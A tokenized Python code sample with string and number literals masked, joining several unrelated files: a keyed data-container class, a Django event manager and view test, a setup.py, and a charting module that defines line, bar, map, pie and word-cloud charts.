<EOL> index = self . compute_index ( ) <EOL> if index is not None : <EOL> return index . get ( key , None ) <EOL> else : <EOL> return key <EOL> def __len__ ( self ) : <EOL> return len ( self . data ) <EOL> def __getitem__ ( self , key ) : <EOL> index = self . find_index ( key ) <EOL> if index is None : <EOL> raise KeyError <EOL> return self . usable_item ( self . data [ index ] ) <EOL> def __setitem__ ( self , key , uitem ) : <EOL> item = self . parse_usable_item ( uitem ) <EOL> index = self . find_index ( key ) <EOL> if index is not None : <EOL> self . data [ index ] = item <EOL> else : <EOL> self . data . append ( item ) <EOL> self . compute_index ( True ) <EOL> def __delitem__ ( self , key ) : <EOL> index = self . find_index ( key ) <EOL> if index is None : <EOL> raise KeyError <EOL> del self . data [ index ] <EOL> self . compute_index ( True ) <EOL> def insert ( self , index , uitem ) : <EOL> item = self . parse_usable_item ( uitem ) <EOL> self . data . insert ( index , item ) <EOL> self . compute_index ( True ) <EOL> def __iter__ ( self ) : <EOL> for item in self . data : <EOL> uitem = self . usable_item ( item ) <EOL> if uitem is None : <EOL> return <EOL> pk = self . get_key_field ( ) <EOL> if pk is None : <EOL> yield uitem <EOL> elif isinstance ( uitem , dict ) : <EOL> yield uitem . get ( pk , None ) <EOL> else : <EOL> yield getattr ( uitem , pk , None ) <EOL> def sync ( self , other , save = True ) : <EOL> if self . get_key_field ( ) is None or other . get_key_field ( ) is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> for key in self : <EOL> other [ key ] = self [ key ] <EOL> if save : <EOL> other . save ( ) <EOL> def copy ( self , other , save = True ) : <EOL> del other . data [ : ] <EOL> for item in self . data : <EOL> uitem = self . usable_item ( item ) <EOL> other . append ( uitem ) <EOL> if save : <EOL> other . save ( ) <EOL> no_pickle = [ ] <EOL> no_pickle_loader = [ ] <EOL> no_pickle_mapper = [ ] <EOL> no_pickle_parser = [ ] <EOL> def get_no_pickle ( self ) : <EOL> return ( <EOL> self . no_pickle + <EOL> self . no_pickle_loader + <EOL> self . no_pickle_mapper + <EOL> self . no_pickle_parser <EOL> ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> for name in self . get_no_pickle ( ) : <EOL> state . pop ( name , None ) <EOL> return state <EOL> def item_dict ( self , item ) : <EOL> return item <EOL> def as_dataframe ( self ) : <EOL> from pandas import DataFrame <EOL> key = self . get_key_field ( ) <EOL> if key : <EOL> data = [ self . item_dict ( row ) for row in self . values ( ) ] <EOL> else : <EOL> data = [ self . item_dict ( row ) for row in self ] <EOL> df = DataFrame ( data ) <EOL> if key : <EOL> df . set_index ( key , inplace = True ) <EOL> return df </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> from calendar import monthrange <EOL> from django . db import models <EOL> from django . db . models import Q <EOL> from django . utils . timezone import make_aware , get_default_timezone <EOL> class EventManager ( models . Manager ) : <EOL> def _get_kwargs ( self , category , tag ) : <EOL> """<STR_LIT>""" <EOL> vals = { <EOL> '<STR_LIT>' : category , <EOL> '<STR_LIT>' : tag <EOL> } <EOL> kwargs = { } <EOL> for k , v in vals . items ( ) : <EOL> if v : <EOL> kwargs [ k ] = v <EOL> return kwargs <EOL> @ staticmethod <EOL> def get_first_and_last ( year , month ) : <EOL> """<STR_LIT>""" <EOL> ym_first = make_aware ( <EOL> datetime . datetime ( year , month , <NUM_LIT:1> ) , <EOL> get_default_timezone ( ) <EOL> ) <EOL> ym_last = make_aware ( <EOL> datetime . datetime ( year , month , monthrange ( year , month ) [ <NUM_LIT:1> ] , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> - <NUM_LIT:1> ) , <EOL> get_default_timezone ( ) <EOL> ) <EOL> return ym_first , ym_last <EOL> def all_month_events ( self , year , month , category = None , tag = None , <EOL> loc = False , cncl = False ) : <EOL> """<STR_LIT>""" <EOL> kwargs = self . _get_kwargs ( category , tag ) <EOL> ym_first , ym_last = self . get_first_and_last ( year , month ) <EOL> pref = [ ] <EOL> if loc : <EOL> pref . append ( "<STR_LIT:location>" ) <EOL> if cncl : <EOL> pref . append ( "<STR_LIT>" ) <EOL> r = Q ( repeat = "<STR_LIT>" ) <EOL> dstart_mo = Q ( start_date__month = month ) <EOL> dend_mo = Q ( end_date__month = month ) <EOL> dstart_yr = Q ( start_date__year = year ) <EOL> dend_yr = Q ( end_date__year = year ) <EOL> return self . model . objects . filter ( <EOL> r & ( dstart_mo | dend_mo ) | <EOL> ( ~ Q ( repeat = "<STR_LIT>" ) ) | <EOL> ( ( dstart_yr | dend_yr ) & ( dstart_mo | dend_yr ) ) , <EOL> Q ( end_repeat = None ) | Q ( end_repeat__gte = ym_first ) , <EOL> start_date__lte = ym_last <EOL> ) . filter ( ** kwargs ) . prefetch_related ( * pref ) . order_by ( '<STR_LIT>' ) . distinct ( ) <EOL> def live ( self , now ) : <EOL> """<STR_LIT>""" <EOL> return self . model . objects . filter ( <EOL> Q ( end_repeat = None ) | Q ( end_repeat__gte = now ) | <EOL> Q ( start_date__gte = now ) | Q ( end_date__gte = now ) <EOL> ) . exclude ( <EOL> start_date__lt = now , end_date__lt = now , <EOL> repeat = "<STR_LIT>" , end_repeat = None , <EOL> ) . prefetch_related ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . urlresolvers import reverse <EOL> from . event_factory import create_event , SetMeUp <EOL> class MultipleEventsListViewTest ( SetMeUp ) : <EOL> """<STR_LIT>""" <EOL> def test_multi ( self ) : <EOL> event1 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> event2 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> event3 = create_event ( <EOL> start_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> end_date = ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) , <EOL> created_by = self . user , <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> repeat = "<STR_LIT>" , <EOL> ) <EOL> events = { <EOL> event1 . title : event1 . description , <EOL> event2 . title : event2 . description , <EOL> event3 . title : event3 . description , <EOL> } <EOL> for month in ( '<STR_LIT:5>' , '<STR_LIT>' ) : <EOL> response = self . client . get ( reverse ( <EOL> '<STR_LIT>' , kwargs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : month } <EOL> ) ) <EOL> for k , v in events . items ( ) : <EOL> self . assertContains ( response , k ) <EOL> self . assertContains ( response , v ) </s>
<s> from setuptools import setup <EOL> from os . path import abspath , dirname , join <EOL> path = abspath ( dirname ( __file__ ) ) <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> required = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> kw = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : open ( join ( path , '<STR_LIT>' ) ) . read ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : classifiers , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : required , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> setup ( ** kw ) </s>
<s> """<STR_LIT>""" <EOL> from . visualization import Visualization <EOL> from . data import Data <EOL> from . transforms import Transform <EOL> from . values import ValueRef <EOL> from . properties import PropertySet <EOL> from . scales import DataRef , Scale <EOL> from . marks import MarkProperties , MarkRef , Mark <EOL> from . axes import Axis <EOL> from . colors import brews <EOL> try : <EOL> import pandas as pd <EOL> except ImportError : <EOL> pd = None <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> np = None <EOL> def data_type ( data , grouped = False , columns = None , key_on = '<STR_LIT>' , iter_idx = None ) : <EOL> '''<STR_LIT>''' <EOL> if iter_idx : <EOL> return Data . from_mult_iters ( idx = iter_idx , ** data ) <EOL> if pd : <EOL> if isinstance ( data , ( pd . Series , pd . DataFrame ) ) : <EOL> return Data . from_pandas ( data , grouped = grouped , columns = columns , <EOL> key_on = key_on ) <EOL> if isinstance ( data , ( list , tuple , dict ) ) : <EOL> return Data . from_iter ( data ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> class Chart ( Visualization ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , columns = None , key_on = '<STR_LIT>' , iter_idx = None , <EOL> width = <NUM_LIT> , height = <NUM_LIT> , grouped = False , no_data = False , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Chart , self ) . __init__ ( * args , ** kwargs ) <EOL> self . width , self . height = width , height <EOL> self . padding = "<STR_LIT>" <EOL> self . columns = columns <EOL> self . _is_datetime = False <EOL> if data is None and not no_data : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not no_data : <EOL> if isinstance ( data , ( list , tuple , dict ) ) : <EOL> if not data : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if isinstance ( data , ( pd . Series , pd . DataFrame ) ) : <EOL> if isinstance ( data . index , pd . DatetimeIndex ) : <EOL> self . _is_datetime = True <EOL> self . data [ '<STR_LIT>' ] = ( <EOL> data_type ( data , grouped = grouped , columns = columns , <EOL> key_on = key_on , iter_idx = iter_idx ) <EOL> ) <EOL> class Line ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Line , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> range = '<STR_LIT>' ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> from_ = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = "<STR_LIT>" ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = "<STR_LIT>" ) , <EOL> stroke = ValueRef ( scale = "<STR_LIT>" , field = '<STR_LIT>' ) , <EOL> stroke_width = ValueRef ( value = <NUM_LIT:2> ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Scatter ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Scatter , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> range = '<STR_LIT>' ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> from_ = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = "<STR_LIT>" ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = "<STR_LIT>" ) , <EOL> size = ValueRef ( value = <NUM_LIT:100> ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Bar ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Bar , self ) . __init__ ( * args , ** kwargs ) <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = '<STR_LIT>' , range = '<STR_LIT:width>' , zero = False , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> stats_transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , value = '<STR_LIT>' ) ] <EOL> stats_data = Data ( name = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> transform = stats_transform ) <EOL> self . data . append ( stats_data ) <EOL> from_transform = [ <EOL> Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , point = '<STR_LIT>' , height = '<STR_LIT>' ) <EOL> ] <EOL> from_ = MarkRef ( data = '<STR_LIT>' , transform = from_transform ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT:y>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> width = ValueRef ( scale = '<STR_LIT:x>' , band = True , offset = - <NUM_LIT:1> ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> StackedBar = Bar <EOL> class Area ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Area , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , zero = False , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> stats_transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , value = '<STR_LIT>' ) ] <EOL> stats_data = Data ( name = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> transform = stats_transform ) <EOL> self . data . append ( stats_data ) <EOL> from_transform = [ <EOL> Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , point = '<STR_LIT>' , height = '<STR_LIT>' ) <EOL> ] <EOL> from_ = MarkRef ( data = '<STR_LIT>' , transform = from_transform ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT:y>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> interpolate = ValueRef ( value = '<STR_LIT>' ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> StackedArea = Area <EOL> class GroupedBar ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , data_labels = False , <EOL> label_color = '<STR_LIT>' , fontsize = <NUM_LIT:12> , baseline = '<STR_LIT>' , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . label_color = label_color <EOL> self . fontsize = fontsize <EOL> self . baseline = baseline <EOL> self . data_labels = data_labels <EOL> super ( GroupedBar , self ) . __init__ ( data = data , * args , ** kwargs ) <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = '<STR_LIT>' , range = '<STR_LIT:width>' , padding = <NUM_LIT> , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> mark_props = MarkProperties ( <EOL> enter = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , value = <NUM_LIT:0> ) , <EOL> width = ValueRef ( scale = '<STR_LIT>' , band = True , offset = - <NUM_LIT:1> ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) ) <EOL> mark_group_marks = [ Mark ( type = '<STR_LIT>' , properties = mark_props ) ] <EOL> if self . data_labels : <EOL> mark_props_text = MarkProperties ( <EOL> enter = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' , offset = <NUM_LIT:0> ) , <EOL> dx = ValueRef ( scale = '<STR_LIT>' , band = True , mult = <NUM_LIT:0.5> ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> align = ValueRef ( value = '<STR_LIT>' ) , <EOL> text = ValueRef ( field = '<STR_LIT>' ) , <EOL> baseline = ValueRef ( value = self . baseline ) , <EOL> fill = ValueRef ( value = self . label_color ) , <EOL> font_size = ValueRef ( value = self . fontsize ) ) ) <EOL> mark_group_marks . append ( Mark ( type = '<STR_LIT:text>' , <EOL> properties = mark_props_text ) ) <EOL> mark_group_from = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> mark_group_props = MarkProperties ( <EOL> enter = PropertySet ( x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT:key>' ) , <EOL> width = ValueRef ( scale = '<STR_LIT:x>' , band = True ) ) ) <EOL> mark_group_scales = [ Scale ( name = "<STR_LIT>" , range = "<STR_LIT:width>" , type = "<STR_LIT>" , <EOL> domain = DataRef ( field = "<STR_LIT>" ) ) ] <EOL> mark_group = Mark ( <EOL> type = '<STR_LIT>' , from_ = mark_group_from , <EOL> properties = mark_group_props , scales = mark_group_scales , <EOL> marks = mark_group_marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Map ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , geo_data = None , projection = "<STR_LIT>" , <EOL> center = None , translate = None , scale = None , rotate = None , <EOL> data_bind = None , data_key = None , map_key = None , <EOL> brew = '<STR_LIT>' , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . raw_data = data <EOL> self . data_key = data_key <EOL> super ( Map , self ) . __init__ ( no_data = True , * args , ** kwargs ) <EOL> geo_kwargs = { } <EOL> for param in [ ( '<STR_LIT>' , projection ) , ( '<STR_LIT>' , center ) , <EOL> ( '<STR_LIT>' , translate ) , ( '<STR_LIT>' , scale ) , <EOL> ( '<STR_LIT>' , rotate ) ] : <EOL> if param [ <NUM_LIT:1> ] : <EOL> geo_kwargs [ param [ <NUM_LIT:0> ] ] = param [ <NUM_LIT:1> ] <EOL> if not translate : <EOL> geo_kwargs [ '<STR_LIT>' ] = [ self . width / <NUM_LIT:2> , self . height / <NUM_LIT:2> ] <EOL> for dat in geo_data : <EOL> transforms = [ ] <EOL> if data is not None and list ( map_key . keys ( ) ) [ <NUM_LIT:0> ] == dat [ '<STR_LIT:name>' ] : <EOL> get_brewer = True <EOL> if not data_key or not data_bind : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . data [ '<STR_LIT>' ] = Data . keypairs ( <EOL> data , columns = [ data_key , data_bind ] <EOL> ) <EOL> key_join = '<STR_LIT:.>' . join ( [ '<STR_LIT:data>' , map_key [ dat [ '<STR_LIT:name>' ] ] ] ) <EOL> data_transform = Transform ( <EOL> type = '<STR_LIT>' , key = key_join , with_ = '<STR_LIT>' , <EOL> with_key = '<STR_LIT>' , as_ = '<STR_LIT:value>' , default = '<STR_LIT>' <EOL> ) <EOL> transforms . append ( data_transform ) <EOL> null_trans = Transform ( <EOL> type = '<STR_LIT>' , test = "<STR_LIT>" <EOL> ) <EOL> transforms . append ( null_trans ) <EOL> else : <EOL> get_brewer = False <EOL> geo_transform = Transform ( <EOL> type = '<STR_LIT>' , value = "<STR_LIT:data>" , ** geo_kwargs <EOL> ) <EOL> transforms . append ( geo_transform ) <EOL> self . data [ dat [ '<STR_LIT:name>' ] ] = Data ( <EOL> name = dat [ '<STR_LIT:name>' ] , url = dat [ '<STR_LIT:url>' ] , transform = transforms <EOL> ) <EOL> if dat . get ( '<STR_LIT>' ) : <EOL> self . data [ dat [ '<STR_LIT:name>' ] ] . format = { <EOL> '<STR_LIT:type>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : dat [ '<STR_LIT>' ] <EOL> } <EOL> geo_from = MarkRef ( data = dat [ '<STR_LIT:name>' ] ) <EOL> enter_props = PropertySet ( <EOL> stroke = ValueRef ( value = '<STR_LIT>' ) , <EOL> path = ValueRef ( field = '<STR_LIT:path>' ) <EOL> ) <EOL> if get_brewer : <EOL> update_props = PropertySet ( <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) <EOL> ) <EOL> domain = [ Data . serialize ( data [ data_bind ] . min ( ) ) , <EOL> Data . serialize ( data [ data_bind ] . quantile ( <NUM_LIT> ) ) ] <EOL> scale = Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , domain = domain , <EOL> range = brews [ brew ] ) <EOL> self . scales [ '<STR_LIT>' ] = scale <EOL> else : <EOL> update_props = PropertySet ( fill = ValueRef ( value = '<STR_LIT>' ) ) <EOL> mark_props = MarkProperties ( enter = enter_props , update = update_props ) <EOL> self . marks . append ( <EOL> Mark ( type = '<STR_LIT:path>' , from_ = geo_from , properties = mark_props ) <EOL> ) <EOL> def rebind ( self , column = None , brew = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . data [ '<STR_LIT>' ] = Data . keypairs ( <EOL> self . raw_data , columns = [ self . data_key , column ] ) <EOL> domain = [ Data . serialize ( self . raw_data [ column ] . min ( ) ) , <EOL> Data . serialize ( self . raw_data [ column ] . quantile ( <NUM_LIT> ) ) ] <EOL> scale = Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , domain = domain , <EOL> range = brews [ brew ] ) <EOL> self . scales [ '<STR_LIT>' ] = scale <EOL> class Pie ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , inner_radius = <NUM_LIT:0> , outer_radius = None , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Pie , self ) . __init__ ( data , * args , ** kwargs ) <EOL> outer_radius = outer_radius or min ( self . width , self . height ) / <NUM_LIT:2> <EOL> self . scales [ "<STR_LIT>" ] = Scale ( <EOL> name = "<STR_LIT>" , type = "<STR_LIT>" , range = "<STR_LIT>" , <EOL> domain = DataRef ( data = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> transform = MarkRef ( <EOL> data = "<STR_LIT>" , transform = [ Transform ( type = "<STR_LIT>" , value = "<STR_LIT>" ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( group = "<STR_LIT:width>" , mult = <NUM_LIT:0.5> ) , <EOL> y = ValueRef ( group = "<STR_LIT>" , mult = <NUM_LIT:0.5> ) , <EOL> start_angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> end_angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> inner_radius = ValueRef ( value = inner_radius ) , <EOL> outer_radius = ValueRef ( value = outer_radius ) , <EOL> stroke = ValueRef ( value = "<STR_LIT>" ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> mark = Mark ( type = "<STR_LIT>" , from_ = transform , <EOL> properties = MarkProperties ( enter = enter_props ) ) <EOL> self . marks . append ( mark ) <EOL> class Word ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Word , self ) . __init__ ( * args , ** kwargs ) <EOL> self . scales [ "<STR_LIT>" ] = Scale ( <EOL> name = "<STR_LIT>" , type = "<STR_LIT>" , range = "<STR_LIT>" , <EOL> domain = DataRef ( data = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> wordcloud_transform = [ <EOL> Transform ( type = "<STR_LIT>" , text = "<STR_LIT>" , <EOL> font = "<STR_LIT>" , font_size = "<STR_LIT>" , <EOL> rotate = { "<STR_LIT>" : list ( range ( - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) } ) ] <EOL> self . data [ <NUM_LIT:0> ] . transform = wordcloud_transform <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( field = "<STR_LIT:x>" ) , <EOL> y = ValueRef ( field = "<STR_LIT:y>" ) , <EOL> angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> align = ValueRef ( value = "<STR_LIT>" ) , <EOL> baseline = ValueRef ( value = "<STR_LIT>" ) , <EOL> font = ValueRef ( field = "<STR_LIT>" ) , <EOL> font_size = ValueRef ( field = "<STR_LIT>" ) , <EOL> text = ValueRef ( field = "<STR_LIT>" ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> mark = Mark ( type = "<STR_LIT:text>" , from_ = MarkRef ( data = "<STR_LIT>" ) , <EOL> properties = MarkProperties ( enter = enter_props ) ) <EOL> self . marks . append ( mark ) </s>
